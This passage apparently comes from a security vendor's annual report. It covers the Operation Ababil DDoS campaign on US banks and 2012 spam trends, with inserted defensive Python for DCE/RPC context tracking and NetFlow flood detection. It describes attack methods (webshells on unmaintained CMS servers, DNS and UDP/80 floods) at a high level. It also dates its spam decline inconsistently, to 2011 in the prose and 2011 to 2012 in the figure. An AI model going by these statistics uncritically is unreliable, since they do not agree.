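    ids = parse_bind_context_ids(bind_pdu)
    results = parse_bind_ack_results(ack_pdu)
    if len(ids) != len(results):
        raise ValueError("bind_ack result count does not match bind context count")
    return [cid for cid, res in zip(ids, results) if res == ACCEPTANCE]


# Constructed sample: three contexts offered for one interface (placeholder
# UUID, not a real interface); the server accepts only context 1.
SAMPLE_IFACE = uuid.UUID("12345678-1234-5678-1234-567812345678")
SAMPLE_BIND = build_bind([(0, SAMPLE_IFACE), (1, SAMPLE_IFACE), (2, SAMPLE_IFACE)])
SAMPLE_ACK = build_bind_ack([2, ACCEPTANCE, 2])

if __name__ == "__main__":
    print("advertised:", parse_bind_context_ids(SAMPLE_BIND))
    print("accepted:", accepted_context_ids(SAMPLE_BIND, SAMPLE_ACK))
```

The point of keeping the accepted list per connection is that later request PDUs name a context id; a request on an id the server rejected is noise, while one on the accepted id is the traffic worth matching against the interface's signatures, which is exactly the distinction a single-context assumption loses.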

    Figure 11: Live Intrusion Prevention System (IPS) Evasions



CASE STUDY

Operation Ababil

During September and October 2012, Cisco and Arbor Networks monitored a targeted and very serious DDoS attack campaign aimed at U.S.-based financial institutions, known as Operation Ababil. The DDoS attacks were premeditated, focused, advertised before the fact, and executed to the letter. Attackers were able to render several major financial sites unavailable to legitimate customers for a period of minutes, and in the most severe instances, hours. Over the course of the events, several groups claimed responsibility for the attacks; at least one group purported to be protesting copyright and intellectual property legislation in the United States. Others broadcast their involvement as a response to a YouTube video offensive to some Muslims.

From a cybersecurity standpoint, Operation Ababil is notable because it took advantage of common web applications and hosting servers that are as popular as they are vulnerable. The other obvious and uncommon factor used in this series of attacks was that simultaneous attacks, at high bandwidth, were launched against multiple companies in the same industry (financial).

As is often seen in the security industry, what's old is new again.

On September 18, 2012, "Cyber Fighters of Izz ad-Din al-Qassam" posted on Pastebin29 beseeching Muslims to target major financial institutions and commodities trading platforms. The threats and specific targets were put up for the world to see and continued for four consecutive weeks. Each week, new threats with new targets were followed up by actions at the appointed times and dates. By the fifth week, the group stopped naming targets but made it clear that campaigns would continue. As promised, the campaigns renewed in earnest in December 2012, once again targeting multiple large U.S. financial organizations.

Phase 2 of Operation Ababil was also announced on Pastebin.30 Instead of infected machines, a variety of PHP web applications, including the Joomla Content Management System, served as the primary "bots" in the campaign. Additionally, many WordPress sites, often using the out-of-date TimThumb plug-in, were being compromised around the same time. The attackers often went after unmaintained servers hosting these applications and uploaded PHP webshells to deploy further attack tools. The concept of command and control did not apply in the usual manner, however; the attackers connected to the tools directly or through intermediate servers, scripts, and proxies. During the cyber events in September and October 2012, a wide array of files and PHP-based tools were used, not just the widely reported "itsoknoproblembro" (aka Brobot). The second round of activity also utilized updated attack tools such as Brobot v2.

Operation Ababil deployed a combination of tools with vectors crossing application-layer attacks on HTTP, HTTPS, and DNS with volumetric attack traffic on a variety of TCP, UDP, ICMP, and other IP protocols. Cisco's analysis showed that the majority of packets were sent to TCP/UDP port 53 (DNS) or 80 (HTTP). While traffic on UDP port 53 and TCP ports 53 and 80 represents normally valid traffic, packets destined for UDP port 80 represent an anomaly not commonly used by applications.

A detailed report of the patterns and payloads of the Operation Ababil campaign can be found in Cisco Event Response: Distributed Denial of Service Attacks on Financial Institutions.31

Lessons Learned

While they are a critical part of any network security portfolio, IPS and firewall devices rely on stateful traffic inspection. Application-layer techniques used in the Operation Ababil campaign easily overwhelmed those state tables and, in several cases, caused them to fail. Intelligent DDoS mitigation technology was the only effective countermeasure.

Managed security services and ISPs have their limits. In a typical DDoS attack, the prevailing wisdom says to deal with volumetric attacks in the network. Application-layer campaigns that are deployed closer to the victim should be addressed at the data center or on the customer edge. Because multiple organizations were targeted concurrently, network scrubbing centers were strained.

It is critical to keep hardware and software current on DDoS mitigation appliances. Older deployments are not always able to deal with newer threats. It is also important to have the right capacity in the right locations. Being able to mitigate a large attack is useless if traffic cannot be channeled to the location where the technology has been deployed.

While cloud or network DDoS mitigation typically has much higher bandwidth capacity, on-premise solutions provide better reaction time against, control of, and visibility into the attacks. Combining the two makes for a more complete solution.

In conjunction with cloud and network DDoS technologies, and as part of the collateral produced for the Operation Ababil events, Cisco has outlined detection and mitigation techniques in the Identifying and Mitigating the Distributed Denial of Service Attacks Targeting Financial Institutions Applied Mitigation Bulletin.32 These techniques include the use of Transit Access Control List (tACL) filtering, NetFlow data analysis, and unicast Reverse Path Forwarding (uRPF). In addition, there are a number of best practices that should be regularly reviewed, tested, and implemented that will greatly help enterprises to prepare for and react to network events. A library of these best practices can be found by referencing the Cisco SIO Tactical Resources33 and Service Provider Security Best Practices.34
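The two traffic signals the case study singles out, turned into the kind of NetFlow data analysis the bulletin recommends, as an added example that is not from the Cisco report or its mitigation bulletin: volume arriving on a protocol/port pair that no normal service uses (UDP port 80), and several organisations being hit at high packet rates inside the same time window. The set of expected services, the flow fields, the thresholds and every address and packet count are constructed for illustration.

```python
"""Flag the Operation Ababil traffic signals in flow records: packets to a
protocol/port pair no normal service uses, and concurrent high-rate targets.

Added example, not from the Cisco report or its mitigation bulletin. Flow
fields, the expected-service set, addresses and counts are constructed.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    start: int      # flow start, seconds since epoch (constructed)
    src: str
    dst: str
    proto: str      # "tcp", "udp", "icmp"
    dport: int      # 0 for protocols without ports
    packets: int


# Constructed: the protocol/port pairs the report calls normally valid for
# these services. Anything else carrying real volume deserves a look.
EXPECTED_SERVICES = {("tcp", 53), ("udp", 53), ("tcp", 80), ("tcp", 443)}


def packets_by_service(flows):
    """Total packets per (proto, dport)."""
    totals = Counter()
    for f in flows:
        totals[(f.proto, f.dport)] += f.packets
    return totals


def anomalous_services(flows, min_packets=1000):
    """(proto, dport) pairs outside the expected set that still carry volume."""
    return {svc: n for svc, n in packets_by_service(flows).items()
            if svc not in EXPECTED_SERVICES and n >= min_packets}


def hot_targets_per_window(flows, window=60, min_pps=100):
    """Map window start -> sorted destinations whose average packet rate in that
    window exceeds min_pps. Several entries under one window is the
    "multiple organisations targeted concurrently" pattern that strained
    scrubbing centers."""
    per_window = defaultdict(Counter)
    for f in flows:
        per_window[f.start - f.start % window][f.dst] += f.packets
    return {w: sorted(dst for dst, n in c.items() if n / window >= min_pps)
            for w, c in per_window.items()}


T0 = 1_350_000_000   # constructed base timestamp (a multiple of 60)
BANK_A, BANK_B, WEB_C = "198.51.100.10", "203.0.113.20", "192.0.2.80"

# Constructed sample flows.
SAMPLE_FLOWS = [
    # ordinary web and DNS traffic to an unrelated site
    Flow(T0 + 5, "203.0.113.77", WEB_C, "tcp", 80, 300),
    Flow(T0 + 9, "203.0.113.78", WEB_C, "udp", 53, 40),
    # floods against two banks in the same minute: UDP/80 plus DNS and HTTP volume
    Flow(T0 + 1, "198.18.0.1", BANK_A, "udp", 80, 5000),
    Flow(T0 + 2, "198.18.0.2", BANK_A, "udp", 53, 4000),
    Flow(T0 + 3, "198.18.0.3", BANK_B, "udp", 80, 5000),
    Flow(T0 + 4, "198.18.0.4", BANK_B, "tcp", 80, 8000),
    # a later, smaller burst against bank A only
    Flow(T0 + 130, "198.18.0.5", BANK_A, "udp", 80, 700),
]

if __name__ == "__main__":
    print("anomalous services:", anomalous_services(SAMPLE_FLOWS))
    print("hot targets per window:", hot_targets_per_window(SAMPLE_FLOWS))
```

The anomalous-service list is what a tACL at the transit edge can act on directly (drop UDP/80 toward the protected prefixes, since nothing legitimate uses it), whereas the per-window target list is the planning input: it shows whether one scrubbing location is about to receive several organisations' attack traffic at once, which the lessons above identify as the capacity problem.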


Spam the Ever Present

However, despite the perception that malware is typically deployed through spam email attachments, Cisco's research shows that very few spammers today rely on this method; instead, they turn to malicious links within the email as a far more efficient distribution mechanism.

Spam is also less scattershot than in the past, with many spammers preferring to target specific groups of users with the hope of generating higher returns. Name-brand pharmaceuticals, luxury watch brands, and events such as tax season top the list of things that spammers promote most in their campaigns. Over time, spammers have learned that the quickest way to attract clicks and purchases, and to generate a profit, is to leverage spoofed brands and take advantage of current events that have the attention of large groups of users.

Global Spam Trends

Since the large-scale botnet takedowns of 2010, high-volume spam isn't as effective as it once was, and spammers have learned and changed their tactics. There is a clear evolution toward smaller, more targeted campaigns based on world events and particular subsets of users. High-volume spam is also more likely to be noticed by mail providers and shut down before its purpose can be fulfilled.


Figure 12: Global Spam Trends

Global spam volumes down 18 percent, with most spammers keeping "banker's hours" on weekends.

Top spam-originating countries, 2012 (share of global spam; the figure also marks each country's gain or decline from 2011):

1. India 12.3%
2. United States 11.38%
3. Korea 4.60%
4. China 4.19%
5. Vietnam 4.00%
6. Russia 3.88%
7. Saudi Arabia 3.60%
8. Brazil 3.60%
9. Taiwan 2.94%
10. Poland 2.72%

Spam language: English 79%, Russian 5%, Catalan 3%, Japanese 3%, Danish 2%, French 1%, Romanian 1%, Spanish 1%, German 1%, Chinese 1%.


In 2011, overall global spam volumes were down 18 percent. This is far from the dramatic drop in volume seen in 2010 following the botnet takedowns, but the continued downward trend is a positive development nonetheless.

Spammers continue their focus on minimizing effort while maximizing impact. According to Cisco's research, spam volumes fall by 25 percent on weekends, when users are often away from their email. Spam volumes rise to the highest levels on Tuesday and Wednesday, an average of 10 percent higher than on other weekdays. This heightened activity in the middle of the week and lower volumes on the weekend allow spammers to live "normal" lives. It also gives them time to spend crafting tailored campaigns based on world events early in the week that will help them to generate a higher response rate to their campaigns.

In 2012, there were several examples of spammers using news about world events, and even human tragedy, to take advantage of users. During Superstorm Sandy, for example, Cisco researchers identified a massive "pump and dump" stock scam based around a spam campaign. Using a pre-existing email message that urged people to invest in a penny stock focused on natural resource exploration, the spammers began attaching sensational headlines about Superstorm Sandy. An unusual aspect of this campaign is that the spammers utilized unique IP addresses to send a batch of spam, and have not activated those addresses since.

Spam Origination

In the world of spam, some countries remain the same while others dramatically change their rankings. In 2012, India retains the top spot as a source of spam worldwide, with the United States moving up from sixth in 2011 to second in 2012. Rounding out the top five spam-originating countries are Korea (third), China (fourth), and Vietnam (fifth).

Overall, the majority of spammers focus their efforts on creating spam messages that feature the languages spoken by the largest audiences who use email on a regular basis. According to Cisco's research, the top language for spam messages in 2012 was English, followed by Russian, Catalan, Japanese, and Danish. Of note, there are gaps between where spam is being sent from and the languages that are being used in the spam message; for example, while India was the number one spam-originating country in 2012, local dialects did not break the top 10 in terms of languages used in spam sent from India. The same was true for Korea, Vietnam, and China.

Figure 13: Spam Origination

India retains spam crown, and United States skyrockets into second position.

[Chart of spam volumes by day of week, Monday through Sunday: +10% gain for the middle of the week, -25% decline for weekends; -18% decline in spam volumes from 2011 to 2012.]


Email Attachments

Spam has long been thought of as a delivery mechanism for malware, especially when an attachment is involved. But Cisco's recent research on the use of email attachments in spam campaigns shows that this perception may be a myth. Only 3 percent of total spam has an attachment, versus 25 percent of valid email. And in the rare cases when a spam message does include an attachment, it is an average of 18 percent larger than a typical attachment that would be included in valid email. As a result, these attachments tend to stand out.

In modern email, links are king. Spammers design their campaigns to convince users to visit websites where they can purchase products or services (often dubious). Once there, users' personal information is collected, often without their knowledge, or they are compromised in some other way.

As the Spoofed Brands analysis that appears later in this section reveals, a majority of spam comes from groups who seek to sell a very specific group of name-brand goods, from luxury watches to pharmaceuticals, that are, in most cases, fake.

IPv6 Spam

While IPv6-based email remains a very small percentage of overall traffic, it is growing as more email users move to IPv6-enabled infrastructure. However, while overall email volumes are growing at a rapid clip, this is not the case with IPv6 spam. This suggests that spammers are hedging against the time and expense to migrate to the new Internet standard. There is no driving need for spammers, and little to no material benefit, to cause such a shift at present. As IPv4 addresses are exhausted and mobile devices and M2M communication drive explosive growth in IPv6, expect spammers to upgrade their infrastructure and accelerate their efforts.

Figure 14: Email Attachments

Only 3 percent of spam has an attachment versus 25 percent of valid email, but spam attachments are 18 percent larger. [Chart: spam email 3% with attachment, valid email 25%; spam attachments 18% larger.]

Figure 15: IPv6 Spam

While IPv6-based email remains a very small percentage of overall traffic, it is growing as more email users move to IPv6-enabled infrastructure. [Chart, June to December: IPv6 email growth 862%, IPv6 spam growth 171%.]


Spoofed Brands

With spoofed-brands spam email, spammers use organizations and products to send their messages in hopes that online users click on a link or make a purchase. The majority of spoofed brands are prescription drugs, such as anti-anxiety medication and painkillers. In addition, luxury watch brands form a constant layer of noise that retains consistency across the entire year.

Cisco's analysis shows that spammers are also skilled at tying their campaigns to news events. From January to March 2012, Cisco data shows a spike in spam relating to Windows software, which coincided with the release of the Windows 8 operating system. From February to April 2012, during the U.S. tax season, analysis shows a